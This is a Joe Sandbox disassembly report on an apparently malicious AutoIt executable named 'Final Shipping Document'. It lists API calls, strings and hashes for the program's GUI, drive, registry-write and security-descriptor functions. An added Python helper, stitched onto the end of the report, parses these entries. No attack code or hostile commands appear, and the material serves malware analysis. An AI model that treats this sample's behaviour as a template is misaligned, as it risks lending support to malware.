                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                            • String ID: 0
                                                            • API String ID: 2760611726-4108050209
                                                            • Opcode ID: 3092b9e54e4ee5d76bd7e05797f6096326d2d9330ee2dd4bc5eb03e5d1bb8caa
                                                            • Instruction ID: 790a1166e1859a0b586f60b957a8a288019c676a2b377dfbdb233cf8482447da
                                                            • Opcode Fuzzy Hash: 3092b9e54e4ee5d76bd7e05797f6096326d2d9330ee2dd4bc5eb03e5d1bb8caa
                                                            • Instruction Fuzzy Hash: FE12AD35200205DFDB25DF28C884BB9B7F5FB44310F1884A9FA899B261CB71EC96DB91
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 00C2273E
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C2286A
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00C228A9
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00C228B9
                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00C22900
                                                            • GetClientRect.USER32(00000000,?), ref: 00C2290C
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00C22955
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C22964
                                                            • GetStockObject.GDI32(00000011), ref: 00C22974
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00C22978
                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00C22988
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C22991
                                                            • DeleteDC.GDI32(00000000), ref: 00C2299A
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C229C6
                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C229DD
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00C22A1D
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C22A31
                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C22A42
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00C22A77
                                                            • GetStockObject.GDI32(00000011), ref: 00C22A82
                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C22A8D
                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00C22A97
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-517079104
                                                            • Opcode ID: 5259453a481c0000c11837491c6764af6fad58ae3d28e2b03a1771b558b2c703
                                                            • Instruction ID: cb8c222c7c5131809b135746961c38c66b87a70e15164f491fe4c8daf6dae4cd
                                                            • Opcode Fuzzy Hash: 5259453a481c0000c11837491c6764af6fad58ae3d28e2b03a1771b558b2c703
                                                            • Instruction Fuzzy Hash: 87B15B71A50215AFEB14DF68DC8AFAE7BB9EB09710F048154F915E72A0DB74ED40CBA0
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 00C14AED
                                                            • GetDriveTypeW.KERNEL32(?,00C3CB68,?,\\.\,00C3CC08), ref: 00C14BCA
                                                            • SetErrorMode.KERNEL32(00000000,00C3CB68,?,\\.\,00C3CC08), ref: 00C14D36
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            • Opcode ID: 57b4c045b1501a2743f8e3420ce2fcd51f30741f0536420e79846370cf403c62
                                                            • Instruction ID: 56c3de8e40159a8a9b0a22df85e0cbe10a3114e2ebdd552de4e068d2ebd8b569
                                                            • Opcode Fuzzy Hash: 57b4c045b1501a2743f8e3420ce2fcd51f30741f0536420e79846370cf403c62
                                                            • Instruction Fuzzy Hash: 1D61B370709105EBCB18DF25CAE1DEDB7A1EB47740B2484A5F806AB291DB35DE81FB81
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 00C37421
                                                            • SetTextColor.GDI32(?,?), ref: 00C37425
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00C3743B
                                                            • GetSysColor.USER32(0000000F), ref: 00C37446
                                                            • CreateSolidBrush.GDI32(?), ref: 00C3744B
                                                            • GetSysColor.USER32(00000011), ref: 00C37463
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C37471
                                                            • SelectObject.GDI32(?,00000000), ref: 00C37482
                                                            • SetBkColor.GDI32(?,00000000), ref: 00C3748B
                                                            • SelectObject.GDI32(?,?), ref: 00C37498
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00C374B7
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C374CE
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00C374DB
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C3752A
                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C37554
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00C37572
                                                            • DrawFocusRect.USER32(?,?), ref: 00C3757D
                                                            • GetSysColor.USER32(00000011), ref: 00C3758E
                                                            • SetTextColor.GDI32(?,00000000), ref: 00C37596
                                                            • DrawTextW.USER32(?,00C370F5,000000FF,?,00000000), ref: 00C375A8
                                                            • SelectObject.GDI32(?,?), ref: 00C375BF
                                                            • DeleteObject.GDI32(?), ref: 00C375CA
                                                            • SelectObject.GDI32(?,?), ref: 00C375D0
                                                            • DeleteObject.GDI32(?), ref: 00C375D5
                                                            • SetTextColor.GDI32(?,?), ref: 00C375DB
                                                            • SetBkColor.GDI32(?,?), ref: 00C375E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1996641542-0
                                                            • Opcode ID: c08c11dafe49dec78d70f73f63e01d4f18b82199acab54437bf9a5fe7351368a
                                                            • Instruction ID: d35e5c2ff13cb40909102dd618a18de5befe2a87a5f567be92ffd9d92905e41d
                                                            • Opcode Fuzzy Hash: c08c11dafe49dec78d70f73f63e01d4f18b82199acab54437bf9a5fe7351368a
                                                            • Instruction Fuzzy Hash: E1615D72910218AFDF119FA4DC89BEE7FB9EB08320F114215F915BB2A1D775A940DF90
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00C31128
                                                            • GetDesktopWindow.USER32 ref: 00C3113D
                                                            • GetWindowRect.USER32(00000000), ref: 00C31144
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C31199
                                                            • DestroyWindow.USER32(?), ref: 00C311B9
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C311ED
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C3120B
                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C3121D
                                                            • SendMessageW.USER32(00000000,00000421,?,?), ref: 00C31232
                                                            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00C31245
                                                            • IsWindowVisible.USER32(00000000), ref: 00C312A1
                                                            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00C312BC
                                                            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00C312D0
                                                            • GetWindowRect.USER32(00000000,?), ref: 00C312E8
                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00C3130E
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00C31328
                                                            • CopyRect.USER32(?,?), ref: 00C3133F
                                                            • SendMessageW.USER32(00000000,00000412,00000000), ref: 00C313AA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: ($0$tooltips_class32
                                                            • API String ID: 698492251-4156429822
                                                            • Opcode ID: 476dcd323971419671ecc3b50e9e341793ffe8ce06cc54779d8ecc9dd49dfdb3
                                                            • Instruction ID: e6d9c4972b366d5adbedbbb57fc469153d87fe817718b4ec65444a05bf1f6cda
                                                            • Opcode Fuzzy Hash: 476dcd323971419671ecc3b50e9e341793ffe8ce06cc54779d8ecc9dd49dfdb3
                                                            • Instruction Fuzzy Hash: ACB19B71618341AFD704DF64C885BAEBBE4FF85310F04891CF999AB2A1CB31E944CB91
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 00C302E5
                                                            • _wcslen.LIBCMT ref: 00C3031F
                                                            • _wcslen.LIBCMT ref: 00C30389
                                                            • _wcslen.LIBCMT ref: 00C303F1
                                                            • _wcslen.LIBCMT ref: 00C30475
                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C304C5
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C30504
                                                              • Part of subcall function 00BBF9F2: _wcslen.LIBCMT ref: 00BBF9FD
                                                              • Part of subcall function 00C0223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C02258
                                                              • Part of subcall function 00C0223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C0228A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                            • API String ID: 1103490817-719923060
                                                            • Opcode ID: 22957180cef18e82b594aa8b357e20b266065fbd4366b46fe8e5f498884b791f
                                                            • Instruction ID: 8f96447136b9f5b661a1fe8e163d89043c95e3f2fd745ebe6d19adfe252de25c
                                                            • Opcode Fuzzy Hash: 22957180cef18e82b594aa8b357e20b266065fbd4366b46fe8e5f498884b791f
                                                            • Instruction Fuzzy Hash: 5BE1B4322282019FC714DF24C4A197EB7E5BF98714F24495CF8A69B7A6D730EE45CB41
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BB8968
                                                            • GetSystemMetrics.USER32(00000007), ref: 00BB8970
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BB899B
                                                            • GetSystemMetrics.USER32(00000008), ref: 00BB89A3
                                                            • GetSystemMetrics.USER32(00000004), ref: 00BB89C8
                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BB89E5
                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BB89F5
                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BB8A28
                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BB8A3C
                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00BB8A5A
                                                            • GetStockObject.GDI32(00000011), ref: 00BB8A76
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB8A81
                                                              • Part of subcall function 00BB912D: GetCursorPos.USER32(?), ref: 00BB9141
                                                              • Part of subcall function 00BB912D: ScreenToClient.USER32(00000000,?), ref: 00BB915E
                                                              • Part of subcall function 00BB912D: GetAsyncKeyState.USER32(00000001), ref: 00BB9183
                                                              • Part of subcall function 00BB912D: GetAsyncKeyState.USER32(00000002), ref: 00BB919D
                                                            • SetTimer.USER32(00000000,00000000,00000028,00BB90FC), ref: 00BB8AA8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: AutoIt v3 GUI
                                                            • API String ID: 1458621304-248962490
                                                            • Opcode ID: b06a577f2a52a9e2cb8e372e886614d2a87d85fa65b6205c0f5aed8556a2e57d
                                                            • Instruction ID: e75b06b0fa50b38b278c4ef6c3422bcb54f8c9b832887e54a72af96a54a877c8
                                                            • Opcode Fuzzy Hash: b06a577f2a52a9e2cb8e372e886614d2a87d85fa65b6205c0f5aed8556a2e57d
                                                            • Instruction Fuzzy Hash: B9B13675A0020AAFDF14DFA8DC85BBE3BF5EB48314F144269FE19A7290DB74A841CB51
                                                            APIs
                                                              • Part of subcall function 00C010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C01114
                                                              • Part of subcall function 00C010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01120
                                                              • Part of subcall function 00C010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C0112F
                                                              • Part of subcall function 00C010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01136
                                                              • Part of subcall function 00C010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C0114D
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C00DF5
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C00E29
                                                            • GetLengthSid.ADVAPI32(?), ref: 00C00E40
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00C00E7A
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C00E96
                                                            • GetLengthSid.ADVAPI32(?), ref: 00C00EAD
                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C00EB5
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00C00EBC
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C00EDD
                                                            • CopySid.ADVAPI32(00000000), ref: 00C00EE4
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C00F13
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C00F35
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C00F47
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00F6E
                                                            • HeapFree.KERNEL32(00000000), ref: 00C00F75
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00F7E
                                                            • HeapFree.KERNEL32(00000000), ref: 00C00F85
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00F8E
                                                            • HeapFree.KERNEL32(00000000), ref: 00C00F95
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00C00FA1
                                                            • HeapFree.KERNEL32(00000000), ref: 00C00FA8
                                                              • Part of subcall function 00C01193: GetProcessHeap.KERNEL32(00000008,00C00BB1,?,00000000,?,00C00BB1,?), ref: 00C011A1
                                                              • Part of subcall function 00C01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C00BB1,?), ref: 00C011A8
                                                              • Part of subcall function 00C01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C00BB1,?), ref: 00C011B7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                            • String ID:
                                                            • API String ID: 4175595110-0
                                                            • Opcode ID: 03bbf9fb776f00509f86d0f3de828a6875590cdaddb44079167765916421d22b
                                                            • Instruction ID: 0b47de9634c620b06575eae1293e1a23abf76ef26ab9e1f3c1ae081a716b0c55
                                                            • Opcode Fuzzy Hash: 03bbf9fb776f00509f86d0f3de828a6875590cdaddb44079167765916421d22b
                                                            • Instruction Fuzzy Hash: DD716A7290020AABDF20DFA4DC89FAEBBB8BF05301F254115FA69B6191D7319A15DB60
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2C4BD
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00C3CC08,00000000,?,00000000,?,?), ref: 00C2C544
                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00C2C5A4
                                                            • _wcslen.LIBCMT ref: 00C2C5F4
                                                            • _wcslen.LIBCMT ref: 00C2C66F
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00C2C6B2
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00C2C7C1
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00C2C84D
                                                            • RegCloseKey.ADVAPI32(?), ref: 00C2C881
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C2C88E
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00C2C960
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 9721498-966354055
                                                            • Opcode ID: a4520c1812f779258e492a7f292cc192d692a5d8e2960b13618ac403cbc52774
                                                            • Instruction ID: 110c80bf7668785137f4ef1412ac7170cc2a91d4a9a914954c28be1d465d8664
                                                            • Opcode Fuzzy Hash: a4520c1812f779258e492a7f292cc192d692a5d8e2960b13618ac403cbc52774
                                                            • Instruction Fuzzy Hash: 6D1268356082119FCB14EF14D891B2EB7E5EF89714F04889DF89A9B7A2DB31ED41CB81
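The record above lists AutoIt's registry-write path (RegConnectRegistryW, RegCreateKeyExW, four RegSetValueExW call sites) with the dwType argument already resolved as a constant at each site. The following Python is an added triage helper, not part of the Joe Sandbox report or of AutoIt: it parses API lines in the bullet format this page uses (plain calls, calls without an argument list such as `_wcslen.LIBCMT ref:`, and `Part of subcall function` lines), turns hex arguments into integers, decodes the RegSetValueExW dwType column using the standard Windows SDK REG_* constants, and reports the module mix and the address range of the function's own call sites so the function can be located in a disassembler. The sample text is copied from the record above plus one subcall line from the DACL record; the regular expression and the three helper names are this example's own assumptions.

```python
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: API lines copied from the Joe Sandbox IDA plugin records on this page.
SAMPLE = """\
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2C4BD
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00C3CC08,00000000,?,00000000,?,?), ref: 00C2C544
• RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00C2C5A4
• _wcslen.LIBCMT ref: 00C2C5F4
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00C2C6B2
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00C2C7C1
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00C2C84D
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00C2C960
  • Part of subcall function 00C010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C01114
"""

# Registry value types from the Windows SDK (winnt.h); these are the real constants.
REG_TYPES = {
    0: "REG_NONE", 1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY",
    4: "REG_DWORD", 5: "REG_DWORD_BIG_ENDIAN", 6: "REG_LINK",
    7: "REG_MULTI_SZ", 11: "REG_QWORD",
}

# Assumed line grammar, derived from the bullet format shown on this page:
#   • [Part of subcall function XXXXXXXX: ]Api.MODULE[(arg,arg,...)][,] ref: XXXXXXXX
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z_0-9]*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                      # address of the call site inside the dumped image
    args: list = field(default_factory=list)  # int for hex constants, None for '?', str otherwise
    subcall: Optional[str] = None  # address of the callee when the line is a subcall entry


def _parse_arg(tok: str):
    """'?' means the plugin could not resolve the value; 8 hex digits is a constant."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-F]{8}", tok):
        return int(tok, 16)
    return tok  # literal strings such as 'AutoIt v3 GUI' or a DLL name


def parse_api_lines(text: str) -> list:
    """Parse every bullet line that matches the report's API-call format; skip the rest."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if not raw else [_parse_arg(t) for t in raw.split(",")]
        calls.append(ApiCall(m.group("api"), m.group("mod"), int(m.group("ref"), 16),
                             args, m.group("sub")))
    return calls


def reg_value_types(calls: list) -> list:
    """Decode the dwType argument (4th parameter) of each RegSetValueExW call site."""
    out = []
    for c in calls:
        if c.api == "RegSetValueExW" and len(c.args) > 3 and isinstance(c.args[3], int):
            out.append(REG_TYPES.get(c.args[3], f"0x{c.args[3]:X}"))
    return out


def module_counts(calls: list) -> Counter:
    """How many call sites per imported module (ADVAPI32, USER32, LIBCMT, ...)."""
    return Counter(c.module for c in calls)


def ref_range(calls: list) -> tuple:
    """Lowest and highest call-site address of the function itself (subcall lines excluded)."""
    own = [c.ref for c in calls if c.subcall is None]
    return (min(own), max(own))


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    print(f"{len(parsed)} calls, modules: {dict(module_counts(parsed))}")
    print("RegSetValueExW types:", reg_value_types(parsed))
    lo, hi = ref_range(parsed)
    print(f"function call sites span {lo:08X}-{hi:08X}")
```

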